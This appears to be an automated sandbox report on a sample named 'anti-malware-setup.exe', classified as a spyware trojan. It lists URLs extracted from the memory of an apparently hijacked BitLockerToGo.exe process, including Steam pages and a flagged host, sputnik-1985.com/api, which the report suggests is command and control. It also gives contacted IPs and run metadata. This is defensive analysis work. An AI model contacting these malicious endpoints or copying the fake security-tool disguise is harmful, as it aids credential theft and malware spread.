https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | - |
                                                                                            high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://steambroadcast-test.akamaizedBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://community.fastly.steamstatic.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://steam.tv/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://store.steampowerBitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://store.steampowered.com/points/shop/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://ocsp.rootca1.amazontrust.com0:BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://sketchfab.comBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://lv.queniujq.cnBitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://steamcommunity.com/profiles/76561199724331900/inventory/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brBitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://www.youtube.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://store.steampowered.com/privacy_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_ABitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://sputnik-1985.com/BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2385447737.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2384397075.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383919449.0000000005AFC000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2383640703.0000000005AFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      unknown
                                                                                                                                      https://login.sbZBitLockerToGo.exe, 00000003.00000003.2432696708.00000000034A8000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://community.fastly.steamstatic.com~TBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.google.com/recaptcha/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://checkout.steampowered.com/BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://sputnik-1985.com/U70BitLockerToGo.exe, 00000003.00000003.2454185919.0000000003463000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455088061.0000000003463000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://store.steampowered.com/;BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://store.steampowered.com/about/BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://help.steampowered.com/en/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://steamcommunity.com/market/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://store.steampowered.com/news/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://cdn.fastly.steamFTBitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://checkout.steampownZBitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356623216.00000000034F6000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://api.steATBitLockerToGo.exe, 00000003.00000003.2411510457.00000000034DC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2411433910.0000000003497000.00000004.00000020.00020000.00000000.sdmpfalse
Name | Source | Malicious | Antivirus Detection | Reputation
(row continued from above) | | | Avira URL Cloud: safe | unknown
https://recaptcha.net/recaptcha/; | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&amp;l=en | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sketchfab.0Z | BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=aep8 | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345639041.0000000003459000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/discussions/ | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://help.st~Z | BitLockerToGo.exe, 00000003.00000003.2345639041.00000000034A9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356666158.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.steampowered.com/stats/ | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://medal.tv | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://broadcast.st.dl.eccdnx.com | BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/steam_refunds/ | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://x1.c.lencr.org/0 | BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | BitLockerToGo.exe, 00000003.00000003.2384267286.0000000005B2F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | BitLockerToGo.exe, 00000003.00000003.2357767548.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357865261.0000000005AB8000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2357621747.0000000005ABB000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900 | BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016 | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sputnik-1985.com:443/api | BitLockerToGo.exe, 00000003.00000003.2432562158.00000000034EA000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://steamcommunity.com/workshop/ | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://login.steampowered.com/ | BitLockerToGo.exe, 00000003.00000003.2336259469.00000000034A9000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | BitLockerToGo.exe, 00000003.00000003.2385701315.0000000005BA5000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c | BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2336106894.00000000034E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345391822.00000000034ED000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2345618551.00000000034ED000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://sputnik-1985.com/apiate | BitLockerToGo.exe, 00000003.00000003.2454654141.00000000034F3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2432642292.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2454541108.00000000034EE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2444465530.00000000034FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2455429001.00000000034F4000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
[Map of contacted IPs by country; legend buckets: No. of IPs < 25%, 25% to 50%, 50% to 75%, over 75%]

IP | Domain | Country | ASN | ASN Name | Malicious
104.21.48.1 | sputnik-1985.com | United States | 13335 | CLOUDFLARENETUS | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1587433
Start date and time: 2025-01-10 11:33:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: anti-malware-setup.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@3/0@13/2
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 33
• Number of non-executed functions: 113
Cookbook Comments:
• Found application associated with file extension: .exe
• Excluded processes from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197, 20.3.187.198, 20.109.210.53, 20.12.23.50
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target anti-malware-setup.exe, PID 4996, because there are no executed functions
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:34:27 | API Interceptor | 11x Sleep call for process: BitLockerToGo.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.48.1 | SH8ZyOWNi2.exe | malicious | CMSBrute | twirpx.org/administrator/index.php
104.21.48.1 | SN500, SN150 Spec.exe | malicious | FormBook | www.antipromil.site/7ykh/
